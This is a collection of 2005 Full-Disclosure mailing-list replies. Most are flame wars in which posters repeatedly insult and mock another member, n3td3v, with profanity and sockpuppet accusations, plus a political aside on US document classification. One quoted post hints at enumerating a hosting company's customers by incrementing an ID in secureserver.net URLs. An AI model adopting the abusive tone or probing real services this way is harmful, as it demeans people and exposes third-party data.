ah 50 years. yes the figures since GWB has died by then and he wont have to care or fear any trouble. i guess that he can also request certain stuff to be buried deep so it wont see the daylight for a long time? - Original Message - From: J.A. Terranson [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: Jamie C. Pole [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 8:28 AM Subject: Re: [Full-disclosure] [Clips] A small editorialaboutrecentevents.(fwd) On Mon, 19 Dec 2005, GroundZero Security wrote: yeah if i still care in 25 years then we'll see. is everything going to be declassified after 25 years in usa ? or does certain stuff stay classified ? i dont know how that works overthere so i thought i'd ask :) Embarrasing stuff (illegal acts, boffing the children, shit like that) is usually classified for 50 years here. Routine stuff can get declassified pretty quickly - under 12 years in most cases. -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF Just once, can't we have a nice polite discussion about the logistics and planning side of large criminal enterprise? - Steve Thompson ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Clips] A small editorialaboutrecentevents.(fwd)
well at least there are smart american people that realize how their rights are slowly beeing put away (piece by piece so the dumb people wont notice) all because of the war on terror. other countries faced terrorist problems too and they didnt invade other countries or started to invade their own peoples privacy or put human rights away. imagine what happened if germany would have had an terror attack and started to invade iraq then make those prison camps all over the world to circumvent human rights and law! i bet usa would attack us as they would say it starts again like 50 years ago... sarcasm but hey afterall every law is just a goddamn piece of paper isnt it ? i wonder why people even bother making laws. /sarcasm - Original Message - From: J.A. Terranson [EMAIL PROTECTED] To: GroundZero Security [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Monday, December 19, 2005 8:43 AM Subject: Re: [Full-disclosure] [Clips] A small editorialaboutrecentevents.(fwd) On Mon, 19 Dec 2005, GroundZero Security wrote: ah 50 years. yes the figures since GWB has died by then and he wont have to care or fear any trouble. i guess that he can also request certain stuff to be buried deep so it wont see the daylight for a long time? Yeah - George is big on making papers disappear: he actually reclassified his predecessors stuff. He's like a cockroach: afraid of daylight. -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF Just once, can't we have a nice polite discussion about the logistics and planning side of large criminal enterprise? - Steve Thompson ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A CALL FOR FULL-DISCLOSURE TO BECOME AMODERATEDLIST
wow this will never end.. a sustained attack against him and the full disclosure of information lol thats another great quote :) its only an attack on his stupidity. if someone is beeing an idiot, we tell him as simple as that. its not like only InfoSecBOFH has been telling n3td0rk to shutup, but basicially the whole list besides you. everyone realizes that he is a fake. we all know he got no skill at all. do you really belive he is one of the most respected security researchers if he can't even code ? a) to ruin netdev's reputation too funny really! we all know he is a nobody and he has nothing to loose as in the security community (public or underground) he is unknown. he never contributed any interesting information at all. no xss does not count since we are all bored of it. b) ruin the future of the full-disclosure list if anyone is trying to do just that, then its n3td3v by annoying anyone here on this list. before he arrived it was all fine, but its just natural that by the amount of bullshit he is talking, he is bound to get negative feedback. all he does is trying to show off with non existing skills. whatever i guess most of us still belive that you and n3td3v are the same person .. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A CALL FOR FULL-DISCLOSURE TO BECOME AMODERATEDLIST
YES NOTHING TO LOOSE ..CAN YOU READ IT NOW ? sorry thought if i write it in caps you'd understand :P he has NO skill, he has NO reputation. period. proove me wrong n3td0rk and show some code else stfu. - Original Message - From: Joe Average To: GroundZero Security ; full-disclosure@lists.grok.org.uk Sent: Sunday, December 18, 2005 4:47 AM Subject: Re: [Full-disclosure] A CALL FOR FULL-DISCLOSURE TO BECOME AMODERATEDLIST On 12/18/05, GroundZero Security [EMAIL PROTECTED] wrote: wow this will never end.. " a sustained attack against him and the full disclosure of information" lol thats another great quote :)its only an attack on his stupidity.if someone is beeing an idiot, we tell him as simple as that. its not like only InfoSecBOFHhas been telling n3td0rk to shutup, but basicially the whole list besides you. everyone realizes that he is a fake. we all know he got no skill at all.do you really belive he is one of the most respected security researchers if he can't even code ? i don't understand your "can't even code" claim: http://www.geocities.com/n3td3v/home/about.html?200518 a) to ruin netdev's reputationtoo funny really! we all know he is a nobody and he has nothing to loose nothing to lose? apart from his up held reputation as "security researcher in the underground for internet related systems" http://www.geocities.com/n3td3v/home/about.html?200518 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A CALL FOR FULL-DISCLOSURE TO BECOME AMODERATEDLIST
n3td3v cant you just stop it ? it gets more and more obvious that: n3td3v == joe average we all know that you have no reputation at all so just get lost! "in the land of the blind the 1-eyed man is king.."- Desiderius Erasmus, Adagia (III, IV, 96) -sk Http://www.groundzero-security.com - Original Message - From: Joe Average To: InfoSecBOFH ; full-disclosure@lists.grok.org.uk Sent: Sunday, December 18, 2005 6:10 AM Subject: Re: [Full-disclosure] A CALL FOR FULL-DISCLOSURE TO BECOME AMODERATEDLIST On 12/18/05, InfoSecBOFH [EMAIL PROTECTED] wrote: This is great.We have n3td3v posting with a different accountthinking that we are all too stupid enough to realize taht "yahooinsider" is him.ROFL a) to ruin netdev's reputationn3d3v did this quite fine on his own thank you. b) ruin the future of the full-disclosure listAgain, already accomplished by n3td3v Sigh i don't believe that to be the full picture. a) you insult him whenever you can (a sign you're a bully) b) you claimed he made up his relationship with yahoo (which he never) c) you call him kiddie, even when he released a google xss infront of you of course, you've done nothing to prove you're more than a troll ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting rid of n3td3v
ok good bye, nice to see your first and last post! - Original Message - From: Allen,Steve [EMAIL PROTECTED] To: [EMAIL PROTECTED]; Cosmin' [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; Joe Average [EMAIL PROTECTED] Sent: Friday, December 16, 2005 4:43 PM Subject: RE: [Full-disclosure] Getting rid of n3td3v hey y'all. my 1st time postin' here. Y'all git rid'a n3td3v you lose me too. Everyone gets 2 b herd here.. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Xyberpix Sent: Friday, December 16, 2005 5:27 AM To: Cosmin'; full-disclosure@lists.grok.org.uk; Joe Average Subject: Re: [Full-disclosure] Getting rid of n3td3v Mm, a slight case of MPD I see... xyberpix On Fri Dec 16 0:38 , Joe Average [EMAIL PROTECTED] sent: On 12/15/05, Stejerean, Cosmin [EMAIL PROTECTED] wrote: I have a simple suggestion to get rid of the n3td3v problem. Aside from creating a spam filter for every message that contains n3td3v or his email address the next best thing to do is simply ignore all his posts. If you feel the need to let him know what a big moron he is then please do so directly to his email address and do not send it to the list. You do not need to prove to anyone else that n3td3v is an idiot; anyone already on the lists should know that by now. If we all ignore any messages from n3td3v and any thread started by him I hope that he will go away and find someone else that will pay attention to his security research. Cosmin Stejerean netdev isn't an idiot, we've had many attacks avoided by him contacting our security address ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Focus
hm i dont see why you guys attack InfoSecBOFH too ? i mean i dont really know him, but as far as i see it, he only told n3td0rk to piss off sofar. so whats wrong with that ? its not like he's been trolling around, he's just been insulting him which i dont see as a problem. just my 2 cents.. - Original Message - From: InfoSecBOFH [EMAIL PROTECTED] To: Full-Disclosure full-disclosure@lists.grok.org.uk Sent: Friday, December 16, 2005 6:46 PM Subject: Re: [Full-disclosure] Security Focus Awe thanks fuckbag. Glad you care. On 12/16/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Fri, 16 Dec 2005 00:59:03 PST, InfoSecBOFH said: Seeing how n3td3v seems it appropriate to subscribe me and/or forward me every post on every securityfuckus mailing list. Somehow, the phrase Couldn't have happened to a more deserving person comes to mind. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Administrivia: Requests for Moderation
i spokewith netdev and i asked him not to respond to bait mail from known nicknames please also ask him not topost any phishing or xss related information. we do not care. tell him to go learn about IT security first and then come back in a few years when he has grown up. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to discover customers of hosting company for
omg the happy script kid Carolyn Meinel strikes again ! that is so 90's -sk http://www.groundzero-security.com - Original Message - From: [EMAIL PROTECTED] To: Carolyn Meinel [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Tuesday, November 15, 2005 5:34 PM Subject: Re: [Full-disclosure] How to discover customers of hosting company for Want to know all the fun customers using websites on related secureserver.net servers? Insert numbers per examples: http://documents.secureserver.net/show/document.aspx?plvid=1name=stats_eula (GoDaddy.com) http://documents.secureserver.net/show/document.aspx?plvid=2name=stats_eula ... http://documents.secureserver.net/show/document.aspx?plvid=111702name=stats_eula etc. How does one develop the procedure for uncovering all these users as noted above? That is left as an exercise for the student. Hint: it is trivial. They buy your book so they too, can be security experts! ;p Carolyn Meinel http://techbroker.com http://happyhacker.org 505-281-9675 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/